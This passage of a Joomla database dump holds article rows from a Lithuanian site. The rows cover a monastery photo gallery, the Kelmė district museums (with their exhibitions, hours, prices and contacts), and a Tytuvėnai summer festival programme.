00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',26,0,15,'','',1,8575,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(185,270,'Galerija','galerija','','<p>[gallery columns=\"4\" filter=\"yes\"]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_585.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_600.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_603.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_613.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_1566.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus1.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus2.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus3.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus5.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus6.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus7.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus8.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus9.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus10.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus11.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus12.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus13.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus14.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus15.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus16.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_055.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_1545.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_1640.jpg\" /]</p>\r\n<p>[gallery_item tag=\"Vienuolynas\" src=\"/images/stories/muziejus/rsz_muziejus4.jpg\" /]</p>\r\n<p>[/gallery]</p>\r\n<p> </p>','',1,0,0,2,'2014-04-10 06:43:16',135,'','2014-04-10 09:49:39',135,0,'0000-00-00 00:00:00','2014-04-10 06:43:16','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',33,0,8,'','',1,301,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(186,271,'Pasiūlymai','pasiulymai','','<p style=\"text-align: justify;\"><img src=\"images/meniu/2024/maitinimas/vienuoliu_pietus.jpg\" border=\"0\" alt=\"\" width=\"1160\" /></p>','',1,0,0,31,'2014-04-17 19:47:03',135,'','2024-05-02 19:05:24',135,135,'2024-05-02 19:05:24','2014-04-17 19:47:03','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,0,14,'','',1,14347,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(187,272,'Muziejai','muziejai','','<div class=\"middle-title\"> </div>\r\n<table border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td> <strong><span style=\"font-size: 19px;\">Kelmės krašto muziejus{gallery cols=5 orientation=horizontal width=200}stories/muziejus/kelmes_krasto_muziejus{/gallery}</span></strong></td>\r\n</tr>\r\n<tr>\r\n<td> </td>\r\n</tr>\r\n<tr>\r\n<td>\r\n<p><strong>Ekspozicijos</strong></p>\r\n<p>Didžiąją dalį muziejaus eksponatų sudaro etnografiniai daiktai, senieji spaudiniai, dvarų kultūros baldai ir indai bei ikonografinė medžiaga.</p>\r\n<p>Dvaro savininkų Gruževskių šeimos ekspozicijoje eksponuojami baldai, indai, nuotraukos, grafikos darbai, informacinė medžiaga apie buvusius dvaro savininkus.</p>\r\n<p>Jono Vadeikio  Amerikos indėnų ekspozicijoje pateikiama medžiaga apie kraštotyrininką, pedagogą Joną Vadeikį – pirmąjį vokiečių rašytojo Karlo Majaus (Karl May) knygos vertėją į lietuvių kalbą, vokiečių rašytojo Karlo Majaus knygos, įvairūs Amerikos indėnų buities daiktai.</p>\r\n<p>Liaudies buities ir meno ekspozicijoje rodomi XIX a. – XX a. pradžioje liaudies buityje naudoti daiktai ir baldai, meno dirbiniai iš medžio.Lietuvos šaulių sąjungos įkūrėjo V. Pūtvio-Putvinskio ekspozicijos fragmentas.</p>\r\n<p>Lietuvos šaulių sąjungos įkūrėjo V. Pūtvio-Putvinskio ekspozicijoje eksponuojamos V. Putvinskio nuotraukos, dokumentai, knygos, asmeniniai daiktai.</p>\r\n<p>Kelmės krašto archeologinių tyrinėjimų ir radinių ekspozicija pasakoja apie apie rajono teritorijoje vykusius archeologinius kasinėjimus ir radinius.</p>\r\n<p>Kelmės krašto istorijos ekspozicijoje rodomi eksponatai, kurie pasakoja apie tremtį, rezistencinį judėjimą, karo laikotarpį bei katalikų bažnyčios istoriją.</p>\r\n<p>Liaudies žemės ūkio apdirbimo įrankių ekspozicija įrengta svirno patalpose. Čia galima pamatyti įvairius liaudies darbo įrankius.</p>\r\n<p>Tradicinių žemdirbystės įrankių ekspozicija įrengta svirno patalpose.</p>\r\n<p><strong>Muziejaus darbo laikas:</strong></p>\r\n<p>Pirmadienį – penktadienį – 8–12 val., 13–17 val.<br />Vasaros metu:<br />pirmadienį – penktadienį – 8–12 val., 13–17 val.<br />šeštadienį – sekmadienį – 10–14 val.</p>\r\n<p><strong>Papildomos paslaugos:</strong></p>\r\n<p>Edukacinių užsiėmimų organizavimas<br />Kelmės dvaro rūmų patalpų nuoma <br />Ekskursijos po Kelmės miestą arba po rajono lankytinas vietas.</p>\r\n<p><strong>Edukaciniai užsiėmimai</strong></p>\r\n<p>Dvarininkų pasakojimai apie dvarą ir jo papročius;</p>\r\n<p>Tradicinis lietuvių audimas staklėmis;</p>\r\n<p>Kelmės dvaro baudžiavinis kalėjimas;</p>\r\n<p>Kaip lietuviai prieš 100 metų gyveno;</p>\r\n<p>Edukacinis užsiėmimas-ekskursija „Kelmės miesto istorija“;</p>\r\n<p>Užgavėnių vaidinimai;</p>\r\n<p>Baudžiavinis dvaro kalėjimas;</p>\r\n<p>Piemenėlių buitis ir žaidimai;</p>\r\n<p>Kalėdiniai burtai Kelmės dvaro rūmų rūsių prietemoje;</p>\r\n<p>Indėnų papročiai ir žaidimai.</p>\r\n<p>Edukaciniai užsiėmimai užsakomi iš anksto.</p>\r\n<p><strong>Muziejaus adresas:</strong></p>\r\n<p>Dvaro g. 15, LT-86111 Kelmė</p>\r\n<p>Tel. (8 427) 61 065</p>\r\n<p>Faks. (8 427) 61 065</p>\r\n<p>El. p. <a href=\"mailto:kelmesmuziejus@gmail.com\">kelmesmuziejus@gmail.com</a></p>\r\n<p>Interneto svetainė <a>www.kelmesmuziejus.lt</a>  </p>\r\n<p><strong><span style=\"font-size: 19px;\">Povilo Višinskio memorialinis muziejus<strong><span style=\"font-size: 19px;\">{gallery cols=5 orientation=horizontal width=200}stories/muziejus/povilo_visinskio_muziejus{/gallery}</span></strong></span></strong></p>\r\n<p>Muziejus atidarytas 1960 m. švietėjo ir literato Povilo Višinskio (1875–1906) sodyboje. Jo gimtajame name įrengta memorialinė ekspozicija, kurioje atsispindi ir kaimynystėje gyvenusios rašytojos Žemaitės (1845–1921) gyvenimo ir kūrybos kelias. Čia kiekvienais metais vyksta Žemaitės literatūrinės premijos įteikimas už geriausią Lietuvoje metų grožinės literatūros prozos kūrinį kaimo tema. Muziejuje eksponuojamos šia premija apdovanotų rašytojų knygos. </p>\r\n<p>Adresas: Ušnėnų kaimas, Užvenčio seniūnija, LT-86356 Kelmės rajonas.</p>\r\n<p>Tel. (8 ~ 427) 59 721. Mob. 8 619 55 662.</p>\r\n<p>Darbo laikas: kiekvieną dieną iš anksto susitarus telefonu.</p>\r\n<p> Interneto svetainė <a>www.kelmesmuziejus.lt</a>  </p>\r\n<p><strong><span style=\"font-size: 19px;\">Užvenčio kraštotyros muziejus<strong><span style=\"font-size: 19px;\">{gallery cols=5 orientation=horizontal width=200}stories/muziejus/uzvencio_muziejus{/gallery}</span></strong></span></strong></p>\r\n<p>Užvenčio kraštotyros muziejus įkurtas 1965 m. Nuo 1973 m. muziejus yra įsikūręs restauruotame Užvenčio dvaro svirne. Šis dvaras garsus tuo, kad čia 1887–1898 m. gyveno rašytoja Marija Pečkauskaitė-Šatrijos Ragana. Čia prabėgo patys geriausi rašytojos metai, čia ji sėmėsi įkvėpimo ir patiems vertingiausiems savo kūriniams – „Sename dvare“, „Viktutė“. Vėliau šis iki šių dienų išlikęs dvaras priklausė Lietuvos Nepriklausomybės Akto signatarui Jonui Smilgevičiui (1870–1942). Muziejuje parengtos ekspozicijos byloja apie šiuos garsius žmones; pateikiama medžiaga apie Užvenčio miestelio istoriją. 2012 m. muziejaus pastatas buvo restauruotas, ekspozicijos atnaujintos.</p>\r\n<p>Adresas: Dvarčiaus kaimas, Užvenčio seniūnija, Kelmės rajonas.</p>\r\n<p>Mob. 8 682 14 008</p>\r\n<p>Darbo laikas: antradieniais – penktadieniais 13–17 val., kitu laiku – iš anksto susitarus telefonu.</p>\r\n<p> Interneto svetainė <a>www.kelmesmuziejus.lt</a>  </p>\r\n<p><strong><span style=\"font-size: 19px;\">Šaukėnų kraštotyros muziejus<strong><span style=\"font-size: 19px;\">{gallery cols=5 orientation=horizontal width=200}stories/muziejus/saukenu_muziejus{/gallery}</span></strong></span></strong></p>\r\n<p>Šaukėnų kraštotyros muziejus įkurtas 1999 m. Muziejuje veikia ekspozicija, supažindinanti su miestelio istorija bei čia gyvenusiais įžymiais žmonėmis. Eksponuojami dailinkės Valerijos Zalensienės dailės darbai, įdomūs liaudies buities eksponatai bei tautodailė. Yra parengta ūkininko trobos ekspozicija. Muziejuje nuolat rengiamos parodos.</p>\r\n<p>Adresas: Juodlės g. 1, Šaukėnai, Kelmės rajonas.</p>\r\n<p>Mob. 8 657 63 149.</p>\r\n<p>Darbo laikas: kiekvieną dieną iš anksto susitarus telefonu.</p>\r\n<p> Interneto svetainė <a>www.kelmesmuziejus.lt</a>  </p>\r\n<p><strong><span style=\"font-size: 19px;\">Žalpių kraštotyros muziejus<strong><span style=\"font-size: 19px;\">{gallery cols=5 orientation=horizontal width=200}stories/muziejus/zalpiu_muziejus{/gallery}</span></strong></span></strong></p>\r\n<p>Muziejus įkurtas 2006 m. buvusiame Žalpių mokyklos pastate, statytame pirmaisiais Lietuvos nepriklausomybės metais. Ekspozicijos skirtos: Jeronimui Raliui (1876–1921), Homero „Odisėjos“ ir „Iliados“ pirmojo vertimo į lietuvių kalbą autoriui; Jonui Garalevičiui (1871–1943), vargonų meistrui bei pirmojo Lietuvos sklandytuvo kūrėjui; Kazimierui Raliui (1885–1958), Lietuvos Steigiamojo seimo nariui, visuomenės veikėjui.</p>\r\n<p>Adresas: Žalpiai, Pakražančio seniūnija, LT-86249 Kelmės rajonas.</p>\r\n<p>Tel. (8 ~ 427) 49 541; mob. 8 610 21 966.</p>\r\n<p>Darbo laikas: kiekvieną dieną iš anksto susitarus telefonu.</p>\r\n<p> Interneto svetainė <a>www.kelmesmuziejus.lt</a>  </p>\r\n<p><strong><span style=\"font-size: 19px;\">Tytuvėnų miško muziejus<strong><span style=\"font-size: 19px;\">{gallery cols=5 orientation=horizontal width=200}stories/muziejus/tytuvenu_muziejus{/gallery}</span></strong></span></strong></p>\r\n<p> Muziejaus ekspozicijoje rodomi paukščių inkilai, medžio drožiniai, paukščių lizdai, miško žvėrių ir paukščių iškamšos.</p>\r\n<p>Muziejus lankomas pagal išankstinį susitarimą.</p>\r\n<p>Adresas: Miškininkų g. 6, Tytuvėnai, Kelmės rajonas.</p>\r\n<p>Tel. (8 ~ 427) 56 651</p>\r\n<p>Interneto svetainė www.trp.lt</p>\r\n<p><strong><span style=\"font-size: 19px;\">Kražių M. K. Sarbievijaus kultūros centro muziejus<strong><span style=\"font-size: 19px;\">{gallery cols=5 orientation=horizontal width=200}stories/muziejus/sarbievijaus_muziejus{/gallery}</span></strong></span></strong></p>\r\n<p>Didžiąją dalį muziejaus eksponatų sudaro etnografiniai daiktai, senieji spaudiniai, fotografijos, atspindinčios miestelio istoriją.</p>\r\n<p><strong>Ekspozicijos</strong></p>\r\n<p>Kražių miestelio urbanistinė raida;</p>\r\n<p>Kražių jėzuitų kolegija (1616–1773 m.);</p>\r\n<p>Vilniaus universitetinė Kražių gimnazija (1817–1844 m.);</p>\r\n<p>Kražių skerdynės (1893 m.);</p>\r\n<p>Kražių istorija nuo 1918 m.;</p>\r\n<p>Jotvingių kryžiaus riterių ordinas (1487–2010 m.).</p>\r\n<p><strong>Edukacinės programos:</strong></p>\r\n<p>Edukacinės programos užsakomos iš anksto.</p>\r\n<p>Edukacinė programa \"Žemaitiška vakaruški\" - 3,00 Eur/asm.</p>\r\n<p>Kitos edukacinės programos - 1,00 Eur/asm.</p>\r\n<p><a href=\"images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf\" target=\"_blank\"><img src=\"images/stories/pdf.png\" border=\"0\" alt=\"Sample Image\" /></a><a href=\"images/stories/muziejus/sarbievijaus_muziejus/edukacines_programos_kraziuose_placiau.pdf\" target=\"_blank\">Edukacinės programos Kražiuose - plačiau</a></p>\r\n<p><strong>Darbo laikas</strong></p>\r\n<p>Birželio 1 d. – rugpjūčio 31 d.:<br /> Antradienį – šeštadienį 8–17 val.</p>\r\n<p>Rugsėjo 1 d. – gegužės 31 d.:<br /> Pirmadienį – penktadienį 8–17 val.</p>\r\n<p><strong>Paslaugų kainos:</strong></p>\r\n<p>Muziejaus lankymas: <strong>1 Eur/asm</strong>.</p>\r\n<p>Moksleiviams, studentams, būtinosios tarnybos kariams, pensininkams taikoma <strong>50 % nuolaida</strong>.</p>\r\n<p>Ikimokyklinio amžiaus vaikai, vaikų namų auklėtinių grupės (pateikę sąrašą), I ir II grupės neįgalieji, Lietuvos Respublikos muziejininkai, Tarptautinės muziejų tarnybos (ICOM) nariai, Kelmės krašto muziejaus Bičiulių klubo nariai, mokytojai, lydintys mokinių grupes, muziejų lanko <strong>nemokamai</strong>.</p>\r\n<p>Fotografavimas ir (arba) filmavimas ekspozicijose ir parodose komerciniais tikslais ir asmeninėms šventėms – 1,50 Eur/asm.</p>\r\n<p>Adresas: Kolegijos g. 5, Kražiai, Kelmės r.</p>\r\n<p>Tel. (8 427) 58 148, 8 622 21 321</p>\r\n<p>El. p. kraziukcgmail.com</p>\r\n<p>Svetainė internete www.kraziai.lt</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p> </p>\r\n<p> </p>','',1,0,0,31,'2014-04-17 20:15:59',135,'','2018-06-12 15:18:49',135,0,'0000-00-00 00:00:00','2014-04-17 20:15:59','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',19,0,13,'','',1,9752,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(188,273,'Gamtos paminklai','gamtos-paminklai','','<p>Gamtos paminklai</p>','',1,0,0,2,'2014-04-17 20:17:00',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2014-04-17 20:17:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,5,'','',1,305,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(189,276,'Programos','programos','','<p><a href=\"http://www.tytuvenai.lt/index.php?option=com_content&amp;view=article&amp;id=121:x-tarptautinio-tytuvn-vasaros-festivalio-programa&amp;catid=53:tytuvn-vasaros-festivalis&amp;Itemid=89\"><img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/logo.jpg\" border=\"0\" width=\"630\" style=\"border: 0px none;\" /></a></p>\r\n<p><img src=\"http://tytuvenai.lt/images/stories/naujienos/2013_festivalio_programa/2.jpg\" border=\"0\" /></p>\r\n<p><img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/1.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/2.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/3.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/4.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/5.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/6.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/7.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/8.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/9.jpg\" border=\"0\" alt=\"\" /><br /> <img src=\"http://tytuvenai.lt/images/stories/tytuvenu_vasaros_festivalis/2014/programa/10.jpg\" border=\"0\" width=\"630\" /></p>','',0,0,0,55,'2014-04-17 20:20:18',135,'','2017-06-07 09:51:00',135,0,'0000-00-00 00:00:00','2014-04-17 20:20:18','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,2,'','',1,1293,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(190,277,'Galerija','galerija','','<p><span>{gallery cols=2 orientation=horizontal width=400}stories/naujienos/tvf_2017_1{/gallery}</span></p>','',1,0,0,55,'2014-04-17 20:20:36',135,'','2017-06-13 06:03:44',135,0,'0000-00-00 00:00:00','2014-04-17 20:20:36','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',7,0,1,'','',1,2631,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(191,278,'Kontaktai','kontaktai','','<p>Kontaktai</p>','',1,0,0,55,'2014-04-17 20:20:55',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2014-04-17 20:20:55','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,0,'','',1,2596,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(328,417,'Spalvotos Kalėdos','kvieciame-visus-i-vakariene-baltas-vakaras-7','','<p>Kviečiame užsisakyti edukaciją - ekskursiją!</p>\r\n','\r\n<p style=\"text-align: justify;\"><img src=\"images/12asa.jpg\" border=\"0\" alt=\"\" /></p>',1,0,0,44,'2017-08-06 08:07:32',135,'','2018-11-02 08:50:16',135,0,'0000-00-00 00:00:00','2017-08-06 08:07:32','0000-00-00 00:00:00','{\"image_intro\":\"images\\/12asadddd.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_la